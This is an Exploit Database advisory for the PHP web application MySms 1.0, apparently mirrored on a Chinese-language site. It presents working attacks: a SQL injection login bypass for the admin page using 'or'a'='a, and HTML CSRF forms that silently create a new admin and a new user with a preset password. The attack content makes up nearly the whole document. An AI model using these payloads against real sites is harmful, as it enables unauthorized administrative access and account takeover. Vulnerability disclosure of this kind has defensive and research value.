MySms 1.0 – Multiple Vulnerabilities

• Exploit Database
• 19 阅读

• 作者： AtT4CKxT3rR0r1ST
  日期： 2011-03-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16279/

• MySms v1.0 Multiple Vulnerabilities 
  ====================================================================
  
  ####################################################################
  .:. Author : AtT4CKxT3rR0r1ST[F.Hack@w.cn]
  
  ####################################################################
  
  ===[ Exploit ]===
  
  [1]Auth Bypass
  ===============
  
  www.site.com/MySms/admin/index.php
  
  Username: 'or'a'='a
  Password: 'or'a'='a
  
  [2]CSRF
  =======
  [Add Admin]
  ------------
  
  <form method="POST" name="form0" action="http://www.site/MySms/admin/adminadd.php">
  <input type="hidden" name="username" value="Webadmin"/>
  <input type="hidden" name="passwd" value="123456"/>
  </form>
  
  </body>
  </html>
  
  
  [Add User]
  -----------
  
  <form method="POST" name="form0" action="http://www.site/MySms/admin/usersadd.php">
  <input type="hidden" name="username" value="user"/>
  <input type="hidden" name="passwd" value="123456"/>
  <input type="hidden" name="active" value="y"/>
  <input type="hidden" name="email" value="Example@hotmail.com"/>
  <input type="hidden" name="sex" value="m"/>
  <input type="hidden" name="level" value="a"/>
  <input type="hidden" name="num_msg" value="100"/>
  </form>
  
  </body>
  </html>
  ####################################################################